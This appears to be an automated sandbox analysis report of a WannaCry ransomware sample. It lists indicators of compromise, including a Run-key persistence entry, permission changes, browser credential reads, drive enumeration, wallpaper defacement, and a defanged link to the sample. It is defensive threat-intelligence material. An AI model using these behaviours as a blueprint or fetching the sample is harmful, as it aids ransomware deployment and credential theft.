wannacry | hxxps://at1as[.]s-ul[.]eu/507rLMd1

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	Eazfuscator.NET Assistant.exe

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD8838.tmp	[email protected]
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD884F.tmp	[email protected]

Executes dropped EXE 48 IoCs

pid	Process
4396	eazfuscator.net.exe
2504	eazfuscator.net.exe
5912	eazfuscator.net.exe
1532	eazfuscator.net.exe
1984	eazfuscator.net.exe
6108	Eazfuscator.NET Enlightenment.exe
5232	Eazfuscator.NET Enlightenment.exe
432	Eazfuscator.NET Assistant.exe
2016	eazfuscator.net.exe
2956	eazfuscator.net.exe
4500	eazfuscator.net.exe
5432	eazfuscator.net.exe
5336	[email protected]
60	taskdl.exe
2736	@[email protected]
1392	@[email protected]
2612	taskhsvc.exe
2040	taskdl.exe
5552	taskse.exe
2916	@[email protected]
3808	taskdl.exe
4568	taskse.exe
2216	@[email protected]
5188	taskse.exe
3716	@[email protected]
5328	taskdl.exe
4592	@[email protected]
5968	taskse.exe
3748	@[email protected]
5500	taskdl.exe
5692	taskse.exe
3340	@[email protected]
2468	taskdl.exe
4204	taskdl.exe
3064	taskse.exe
552	taskse.exe
3220	@[email protected]
4868	taskdl.exe
3160	[email protected]
5964	taskse.exe
3052	@[email protected]
5048	taskdl.exe
4192	taskse.exe
1008	@[email protected]
5188	taskdl.exe
820	taskse.exe
636	@[email protected]
4248	taskdl.exe

Loads dropped DLL 64 IoCs

pid	Process
5156	MsiExec.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe
5476	rundll32.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
3352	icacls.exe
100	icacls.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\fnnvghpejgiq616 = "\"C:\\Users\\Admin\\Desktop\\WannaCrypt0r\\tasksche.exe\""	reg.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
326	1008	msiexec.exe
328	1008	msiexec.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2684	powershell.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
512	raw.githubusercontent.com
513	raw.githubusercontent.com
514	raw.githubusercontent.com
515	raw.githubusercontent.com

Sets desktop wallpaper using registry 2 TTPs 3 IoCs

ransomware

Defacement

T1491

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	[email protected]
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	@[email protected]
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	@[email protected]

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Gapotchenko.Eazfuscator.NET.Deployment.Installer.dll	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Homogenization\.NET Core\2.0\System.Runtime.dll	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Integration\Unity\Eazfuscator.NET.Integration.Unity.Editor.dll	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Integration\MSBuild\Eazfuscator.NET.WinRT.targets	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Vendor\Gapotchenko.Components.G1206.dll	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Vendor\Microsoft.Bcl.AsyncInterfaces.dll	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\SDKs\.NET\Gapotchenko.Eazfuscator.NET.SDK.xml	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Vendor\Gapotchenko.FX.Data.Encoding.Base32.dll	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Vendor\Gapotchenko.FX.Diagnostics.WebBrowser.dll	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Vendor\Gapotchenko.FX.Data.Json.Serialization.dll	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Vendor\System.Collections.Immutable.dll	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Vendor\System.ValueTuple.dll	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Eazfuscator.NET.Assistant.Options.dll	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Vendor\Gapotchenko.FX.Data.Integrity.Checksum.Crc32.dll	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Vendor\Gapotchenko.FX.UI.dll	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Vendor\System.ComponentModel.Annotations.dll	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Vendor\Gapotchenko.FX.Data.Json.dll	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Vendor\Gapotchenko.FX.Math.Combinatorics.dll	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Vendor\Gapotchenko.FX.Math.Geometry.dll	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Gapotchenko.Eazfuscator.NET.Resources.dll	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Vendor\Gapotchenko.FX.Versioning.dll	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Vendor\Gapotchenko.FX.Math.Topology.dll	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Vendor\Gapotchenko.FX.Runtime.CompilerServices.Intrinsics.dll	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Vendor\System.Threading.AccessControl.dll	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Eazfuscator.NET.Assistant.Endpoint.dll	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Integration\MSBuild\Eazfuscator.NET.ClickOnce.targets	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Integration\MSBuild\Eazfuscator.NET.WAP.targets	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Vendor\Gapotchenko.FX.Linq.Expressions.dll	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Integration\MSBuild\Eazfuscator.NET.Cooperation.targets	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Integration\MSBuild\Eazfuscator.NET.SQL.targets	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Gapotchenko.Eazfuscator.NET.Configuration.dll	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Integration\MSBuild\Eazfuscator.NET.VSIX.targets	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Vendor\Microsoft.Bcl.HashCode.dll	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Integration\MSBuild\Eazfuscator.NET.Bootstrap.Core.targets	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Gapotchenko.Eazfuscator.NET.Deployment.Prerequisites.dll	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Vendor\Gapotchenko.FX.Scripting.Lisp.dll	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Vendor\Gapotchenko.FX.Diagnostics.Process.dll	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Vendor\Gapotchenko.FX.Runtime.InteropServices.dll	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Integration\MSBuild\net40\Eazfuscator.NET.Integration.MSBuild.Tasks.dll	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Integration\MSBuild\Eazfuscator.NET.Portable.targets	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Integration\MSBuild\Eazfuscator.NET.Xamarin.targets	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Vendor\System.Memory.dll	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Vendor\System.Security.AccessControl.dll	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Vendor\Gapotchenko.FX.Data.Encoding.dll	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Vendor\protobuf-net.dll	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Vendor\RestSharp.dll	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Vendor\System.Runtime.CompilerServices.Unsafe.dll	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Vendor\System.Security.Cryptography.ProtectedData.dll	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Code Snippets\VB.NET\ObfuscationAttributes.vb	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Integration\MSBuild\Eazfuscator.NET.Silverlight.targets	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Legal\Eazfuscator.NET Legal Notices.rtf	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Vendor\Gapotchenko.FX.Security.Cryptography.Genesis.dll	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\eazfuscator.net.exe.config	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Integration\MSBuild\Eazfuscator.NET.MAUI.targets	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Vendor\Gapotchenko.FX.Data.Integrity.Checksum.dll	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Legal\Eazfuscator.NET EULA.rtf	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Vendor\Gapotchenko.FX.Runtime.Caching.dll	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Vendor\Microsoft.WindowsAPICodePack.Shell.dll	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Updater\client.wyc	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Integration\MSBuild\Eazfuscator.NET.Bootstrap.targets	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Integration\MSBuild\Eazfuscator.NET.Common.MsbV40.targets	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Eazfuscator.NET Enlightenment.exe.config	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Gapotchenko.Eazfuscator.NET.dll	msiexec.exe
File created	C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Vendor\AG.Configuration.SettingsProviders.dll	msiexec.exe

Drops file in Windows directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\MSI7481.tmp-\System.Buffers.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI501A.tmp-\Gapotchenko.FX.Collections.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI501A.tmp-\Microsoft.Bcl.TimeProvider.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI52CA.tmp-\Gapotchenko.FX.Math.Intervals.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI5482.tmp-\System.Text.Encodings.Web.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI52CA.tmp-\System.Numerics.Vectors.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI84EE.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8CFF.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8CFF.tmp-\System.Memory.dll	rundll32.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\UIAutomationProvider\52ccfa7030b9fcd810829d4523ab3ce9\UIAutomationProvider.ni.dll.aux.tmp	mscorsvw.exe
File opened for modification	C:\Windows\Installer\MSI7481.tmp-\Microsoft.Deployment.WindowsInstaller.dll	rundll32.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1780-0\PresentationUI.dll	mscorsvw.exe
File opened for modification	C:\Windows\Installer\MSI7481.tmp-\Polly.Core.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI858B.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8CFF.tmp-\Microsoft.Deployment.WindowsInstaller.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI52CA.tmp-\System.Buffers.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI52CA.tmp-\System.ComponentModel.Annotations.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI553E.tmp-\CustomAction.config	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI581E.tmp-\Gapotchenko.FX.Reflection.Loader.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI553E.tmp-\Microsoft.Bcl.TimeProvider.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\{F3006C7B-6BAD-4795-911A-655DF23227BD}\efdoc.ico	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI581E.tmp-\System.ValueTuple.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI7481.tmp-\System.Runtime.CompilerServices.Unsafe.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI52CA.tmp-\Polly.dll	rundll32.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5482.tmp-\System.Text.Json.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI553E.tmp-\Gapotchenko.FX.Threading.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI8CFF.tmp-\Gapotchenko.FX.Threading.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI8CFF.tmp-\System.Text.Json.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI501A.tmp-\CustomAction.config	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI8CFF.tmp-\Gapotchenko.FX.Diagnostics.CommandLine.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI8CFF.tmp-\Gapotchenko.FX.Diagnostics.Process.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI581E.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI581E.tmp-\CustomAction.config	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI5909.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7481.tmp-\Gapotchenko.FX.Threading.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI5482.tmp-\System.Threading.Tasks.Extensions.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI581E.tmp-\System.Text.Json.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI581E.tmp-\Microsoft.Deployment.WindowsInstaller.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI84EE.tmp-\System.Memory.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI501A.tmp-\Gapotchenko.FX.Text.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI5482.tmp-\System.Numerics.Vectors.dll	rundll32.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1494-0\UIAutomationProvider.dll	mscorsvw.exe
File created	C:\Windows\Installer\e594f03.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI581E.tmp-\Gapotchenko.FX.Collections.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI581E.tmp-\Polly.Core.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI7481.tmp-\Gapotchenko.FX.Collections.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI84EE.tmp-\System.ComponentModel.Annotations.dll	rundll32.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Security\7355af105ad86679d6c9070a9b4dc0c3\System.Security.ni.dll.aux.tmp	mscorsvw.exe
File opened for modification	C:\Windows\Installer\MSI501A.tmp-\Gapotchenko.FX.Reflection.Loader.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI501A.tmp-\Microsoft.Deployment.WindowsInstaller.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI553E.tmp-\Gapotchenko.FX.Collections.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI581E.tmp-\Microsoft.Bcl.TimeProvider.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI7481.tmp-\System.Threading.Tasks.Extensions.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI52CA.tmp-\YamlDotNet.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI5482.tmp-\Gapotchenko.FX.Reflection.Loader.dll	rundll32.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\UIAutomationTypes\5ff5b535adaf24cc6d56a1b0744396d9\UIAutomationTypes.ni.dll.aux.tmp	mscorsvw.exe
File opened for modification	C:\Windows\Installer\MSI7481.tmp-\Gapotchenko.FX.Diagnostics.CommandLine.dll	rundll32.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI581E.tmp-\System.ComponentModel.Annotations.dll	rundll32.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\12f8-0\Gapotchenko.FX.dll	mscorsvw.exe
File opened for modification	C:\Windows\Installer\MSI5482.tmp-\Gapotchenko.FX.IO.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI84EE.tmp-\Gapotchenko.FX.Reflection.Loader.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI8CFF.tmp-\System.Numerics.Vectors.dll	rundll32.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 60 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskhsvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
